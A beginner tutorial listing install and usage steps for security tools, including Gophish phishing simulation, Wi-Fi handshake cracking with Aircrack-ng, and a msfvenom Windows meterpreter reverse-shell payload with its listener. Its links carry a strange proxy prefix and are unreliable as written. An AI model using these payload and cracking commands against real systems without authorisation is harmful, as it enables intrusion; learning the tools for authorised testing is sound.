# Tech & Hacking Topics Guide
This guide provides installation steps and basic usage for each of the popular tech
and hacking topics.
---
## 1. OSINT Techniques with Maltego and Recon-ng
### Maltego:
1. **Install**: Download Maltego Community Edition from [Maltego
website](https://www.maltego.com/downloads/).
2. **Run**: After installation, open Maltego and sign up for an account to start
using.
### Recon-ng:
1. **Install**:
```
sudo apt update
sudo apt install recon-ng
```
2. **Run**:
```
recon-ng
```
3. **Usage**: Use modules such as `search_dns` and `search_pwnedemail` for various
OSINT tasks.
---
## 2. Phishing Attack Simulation
### Gophish (Phishing Framework):
1. **Install**:
```
wget https://github.com/gophish/gophish/releases/download/v0.11.0/gophish-
v0.11-linux-64bit.zip
unzip gophish-v0.11-linux-64bit.zip
cd gophish
sudo ./gophish
```
2. **Access Web Interface**: Go to `https://localhost:3333` and log in with default
credentials.
3. **Create Campaigns**: Design emails and landing pages to simulate phishing
attacks (for ethical testing only).
---
## 3. Setting Up a Honeypot with Cowrie
### Cowrie:
1. **Install**:
```
sudo apt update
sudo apt install python3-virtualenv git
git clone https://github.com/cowrie/cowrie
cd cowrie
virtualenv cowrie-env
source cowrie-env/bin/activate
pip install -r requirements.txt
```
2. **Configure**:
- Edit `cowrie.cfg` to adjust settings.
3. **Run**:
```
bin/cowrie start
```
---
## 4. Exploring the Dark Web with Tor
### Tor Browser:
1. **Install**:
```
sudo apt update
sudo apt install tor torbrowser-launcher
```
2. **Run**:
```
torbrowser-launcher
```
3. **Use**: Navigate through .onion sites using Tor for anonymity.
---
## 5. Automating Tasks with Python
### Example Script (Port Scanner):
1. **Install Python**:
```
sudo apt install python3
```
2. **Script**:
```python
import socket
def port_scanner(ip, port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((ip, port))
if result == 0:
print(f"Port {port} is open!")
sock.close()
ip = "192.168.1.1"
for port in range(20, 1025):
port_scanner(ip, port)
```
---
## 6. Wireless Hacking with Aircrack-ng and Wifite
### Aircrack-ng:
1. **Install**:
```
sudo apt install aircrack-ng
```
2. **Usage**:
```
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon
sudo aircrack-ng -w /path/to/wordlist -b [BSSID] /path/to/capture_file.cap
```
### Wifite:
1. **Install**:
```
sudo apt install wifite
```
2. **Run**:
```
sudo wifite
```
---
## 7. Creating Custom Payloads in Metasploit
1. **Install Metasploit**:
```
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/
config/templates/metasploit-framework-wrappers/msfupdate | sh
```
2. **Create Payload**:
```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[your IP] LPORT=[port] -f exe
> payload.exe
```
3. **Start Listener**:
```
msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST [your IP]
set LPORT [port]
exploit
```
---
## 8. Ethical Hacking Challenges for Beginners (TryHackMe)
1. **Sign up**: Register at [TryHackMe](https://tryhackme.com) for various hacking
challenges.
2. **Connect to Labs**: Follow instructions on each lab to access the virtual
hacking environments.
---
**End of Guide**
Remember: Use these tools responsibly and only in environments where you have
explicit permission.